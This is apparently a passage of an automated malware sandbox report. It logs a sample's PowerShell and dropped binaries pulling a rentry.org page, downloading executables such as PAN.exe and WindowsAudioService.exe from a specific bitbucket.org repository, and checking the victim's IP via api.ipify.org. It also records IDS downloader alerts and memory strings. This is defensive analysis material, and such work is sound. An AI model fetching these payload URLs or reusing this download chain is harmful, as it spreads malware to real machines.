                        Source: powershell.exe, 00000003.00000002.1500962112.000001D4594DC000.00000004.00000800.00020000.00000000.sdmpString found in memory: style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com bitbucket.org; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com xp.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io *.ingest.sentry.io events.launchdarkly.com app.launchdarkly.com statsigapi.net fd-config.us-east-1.prod.public.atl-paas.net fd-config-bifrost.prod-east.frontend.public.atl-paas.net 
micros--prod-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--prod-east--bitbucketci-file-service--files.s3.amazonaws.com micros--stg-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--stg-east--bitbucketci-file-service--files.s3.amazonaws.com micros--ddev-west--bitbucketci-file-service--files.s3.ap-southeast-2.amazonaws.com bqlf8qjztdtr.statuspage.io https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; object-src 'none'; base-uri 'self'; report-uri https://web-security-reports.services.atlassian.com/csp-report/bb-website
                        Source: powershell.exe, 00000003.00000002.1500962112.000001D459440000.00000004.00000800.00020000.00000000.sdmpString found in memory: Content-Security-Policy: style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com bitbucket.org; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com xp.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io *.ingest.sentry.io events.launchdarkly.com app.launchdarkly.com statsigapi.net fd-config.us-east-1.prod.public.atl-paas.net fd-config-bifrost.prod-east.frontend.public.atl-paas.net 
micros--prod-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--prod-east--bitbucketci-file-service--files.s3.amazonaws.com micros--stg-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--stg-east--bitbucketci-file-service--files.s3.amazonaws.com micros--ddev-west--bitbucketci-file-service--files.s3.ap-southeast-2.amazonaws.com bqlf8qjztdtr.statuspage.io https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; object-src 'none'; base-uri 'self'; report-uri https://web-security-reports.services.atlassian.com/csp-report/bb-website
                        Source: powershell.exe, 00000003.00000002.1500962112.000001D459440000.00000004.00000800.00020000.00000000.sdmpString found in memory: Content-Security-Policy: object-src 'none'; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com bitbucket.org; base-uri 'self'; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com xp.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io *.ingest.sentry.io events.launchdarkly.com app.launchdarkly.com statsigapi.net fd-config.us-east-1.prod.public.atl-paas.net 
fd-config-bifrost.prod-east.frontend.public.atl-paas.net micros--prod-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--prod-east--bitbucketci-file-service--files.s3.amazonaws.com micros--stg-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--stg-east--bitbucketci-file-service--files.s3.amazonaws.com micros--ddev-west--bitbucketci-file-service--files.s3.ap-southeast-2.amazonaws.com bqlf8qjztdtr.statuspage.io https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; report-uri https://web-security-reports.services.atlassian.com/csp-report/bb-website
                        Source: powershell.exe, 00000003.00000002.1500962112.000001D459355000.00000004.00000800.00020000.00000000.sdmp | String found in memory: Content-Security-Policy: base-uri 'self'; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com xp.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io *.ingest.sentry.io events.launchdarkly.com app.launchdarkly.com statsigapi.net fd-config.us-east-1.prod.public.atl-paas.net fd-config-bifrost.prod-east.frontend.public.atl-paas.net micros--prod-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--prod-east--bitbucketci-file-service--files.s3.amazonaws.com micros--stg-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--stg-east--bitbucketci-file-service--files.s3.amazonaws.com micros--ddev-west--bitbucketci-file-service--files.s3.ap-southeast-2.amazonaws.com bqlf8qjztdtr.statuspage.io https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com bitbucket.org; object-src 'none'; report-uri https://web-security-reports.services.atlassian.com/csp-report/bb-website
                        Source: powershell.exe, 00000003.00000002.1500962112.000001D4594B1000.00000004.00000800.00020000.00000000.sdmp | String found in memory: object-src 'none'; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com bitbucket.org; base-uri 'self'; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com xp.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io *.ingest.sentry.io events.launchdarkly.com app.launchdarkly.com statsigapi.net fd-config.us-east-1.prod.public.atl-paas.net fd-config-bifrost.prod-east.frontend.public.atl-paas.net micros--prod-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--prod-east--bitbucketci-file-service--files.s3.amazonaws.com micros--stg-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--stg-east--bitbucketci-file-service--files.s3.amazonaws.com micros--ddev-west--bitbucketci-file-service--files.s3.ap-southeast-2.amazonaws.com bqlf8qjztdtr.statuspage.io https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; report-uri https://web-security-reports.services.atlassian.com/csp-report/bb-website
                        Source: powershell.exe, 0000001E.00000002.2120942221.00000190B9821000.00000004.00000800.00020000.00000000.sdmp | String found in memory: base-uri 'self'; object-src 'none'; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com xp.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io *.ingest.sentry.io events.launchdarkly.com app.launchdarkly.com statsigapi.net fd-config.us-east-1.prod.public.atl-paas.net fd-config-bifrost.prod-east.frontend.public.atl-paas.net micros--prod-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--prod-east--bitbucketci-file-service--files.s3.amazonaws.com micros--stg-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--stg-east--bitbucketci-file-service--files.s3.amazonaws.com micros--ddev-west--bitbucketci-file-service--files.s3.ap-southeast-2.amazonaws.com bqlf8qjztdtr.statuspage.io https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com bitbucket.org; script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; report-uri https://web-security-reports.services.atlassian.com/csp-report/bb-website
                        Source: powershell.exe, 0000001E.00000002.2120942221.00000190B97FD000.00000004.00000800.00020000.00000000.sdmp | String found in memory: Content-Security-Policy: base-uri 'self'; object-src 'none'; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com xp.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io *.ingest.sentry.io events.launchdarkly.com app.launchdarkly.com statsigapi.net fd-config.us-east-1.prod.public.atl-paas.net fd-config-bifrost.prod-east.frontend.public.atl-paas.net micros--prod-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--prod-east--bitbucketci-file-service--files.s3.amazonaws.com micros--stg-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--stg-east--bitbucketci-file-service--files.s3.amazonaws.com micros--ddev-west--bitbucketci-file-service--files.s3.ap-southeast-2.amazonaws.com bqlf8qjztdtr.statuspage.io https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com bitbucket.org; script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; report-uri https://web-security-reports.services.atlassian.com/csp-report/bb-website
                        Source: global traffic | HTTP traffic detected: GET /pancek61111111111111/raw HTTP/1.1 | Host: rentry.org | Connection: Keep-Alive
                        Source: global traffic | HTTP traffic detected: GET /goodfuture91/goodfuture511/raw/691a0c82f5c7b1d896caabdcdeb16ee9a65a596d/PAN.exe HTTP/1.1 | Host: bitbucket.org | Connection: Keep-Alive
                        Source: global traffic | HTTP traffic detected: GET /goodfuture91/goodfuture511/raw/984b882302ec52a90ac71aa3b8aecff3900592a4/P.exe HTTP/1.1 | Host: bitbucket.org
                        Source: global traffic | HTTP traffic detected: GET /goodfuture91/goodfuture511/raw/691a0c82f5c7b1d896caabdcdeb16ee9a65a596d/WindowsAudioService.exe HTTP/1.1 | Host: bitbucket.org
                        Source: global traffic | HTTP traffic detected: GET /goodfuture91/goodfuture511/raw/64c80586bb78a4f95934a071956e2dccca8efe42/p.rar HTTP/1.1 | Host: bitbucket.org | Connection: Keep-Alive
                        Source: global traffic | HTTP traffic detected: GET /?format=text HTTP/1.1 | Host: api.ipify.org | Accept-Encoding: identity
                        Source: global traffic | HTTP traffic detected: GET /?format=text HTTP/1.1 | Host: api.ipify.org | Accept-Encoding: identity
                        Source: global traffic | HTTP traffic detected: GET /?format=text HTTP/1.1 | Host: api.ipify.org | Accept-Encoding: identity
                        Source: unknown | DNS query: name: api.ipify.org
                        Source: unknown | DNS query: name: api.ipify.org
                        Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49712 -> 185.166.143.50:443
                        Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49711 -> 185.166.143.50:443
                        Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exe | Code function: 31_2_64964610 connect,setsockopt,inet_ntoa,recv,recvfrom,31_2_64964610
                        Source: mgne4i3n.t1d0.exe, 0000000B.00000002.1678511629.000000000285A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: IndexedDB\https_www.youtube.com_0.indexeddb.leveldb equals www.youtube.com (Youtube)
                        Source: mgne4i3n.t1d0.exe, 0000000B.00000002.1678511629.000000000285A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: IndexedDB\https_www.youtube.com_0.indexeddb.leveldb@\ equals www.youtube.com (Youtube)
                        Source: mgne4i3n.t1d0.exe, 0000000B.00000002.1678511629.000000000285A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: IndexedDB\https_www.youtube.com_0.indexeddb.leveldb`, equals www.youtube.com (Youtube)
                        Source: mgne4i3n.t1d0.exe, 0000000B.00000002.1678511629.000000000285A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: q#www.youtube.com_0.indexeddb.le equals www.youtube.com (Youtube)
                        Source: mgne4i3n.t1d0.exe, 0000000B.00000002.1678511629.0000000002471000.00000004.00000800.00020000.00000000.sdmp, mgne4i3n.t1d0.exe, 0000000B.00000002.1678511629.000000000285A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: q3IndexedDB\https_www.youtube.com_0.indexeddb.leveldb@\ equals www.youtube.com (Youtube)
                        Source: global traffic | DNS traffic detected: DNS query: rentry.org
                        Source: global traffic | DNS traffic detected: DNS query: bitbucket.org
                        Source: global traffic | DNS traffic detected: DNS query: api.ipify.org
                        Source: powershell.exe, 00000003.00000002.1500962112.000001D459440000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2120942221.00000190B97FD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://bitbucket.org
                        Source: mgne4i3n.t1d2.exe, 0000000E.00000003.1486855187.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1849282939.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000029.00000003.1942221585.000002C498ACB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.di
                        Source: clppth.exe, 00000026.00000002.3773423449.00000156D219C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1973533379.00000156D218F000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000029.00000003.2060011719.000002C498ACE000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000029.00000002.3773078057.000002C498ADB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.co
                        Source: mgne4i3n.t1d2.exe, 0000000E.00000003.1491053063.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1495251881.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1482776752.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1491267047.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1483659112.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1493142728.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1477767217.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1476660244.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1480606739.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1476445244.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1486855187.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1488844355.000002C8869C9000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1486647943.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1495572319.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1488844355.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1848986032.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1853576082.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000002.3773423449.00000156D219C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1851908535.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1855913817.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1849130676.00000156D218C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                        Source: mgne4i3n.t1d2.exe, 0000000E.00000003.1491053063.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1495251881.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1482776752.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1491267047.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1483659112.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1493142728.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1477767217.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1476660244.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1480606739.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1476445244.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1486855187.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1486647943.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1495572319.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1488844355.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1848986032.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1853576082.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1851908535.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1855913817.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1849130676.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1973533379.00000156D218F000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1848837705.00000156D218C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                        Source: mgne4i3n.t1d2.exe, 0000000E.00000003.1491053063.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1495251881.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1482776752.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1491267047.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1483659112.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1493142728.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1477767217.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1476660244.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1480606739.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1476445244.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1486855187.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1486647943.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1495572319.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000000E.00000003.1488844355.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1848986032.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1853576082.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1851908535.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1855913817.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1849130676.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1973533379.00000156D218F000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1848837705.00000156D218C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
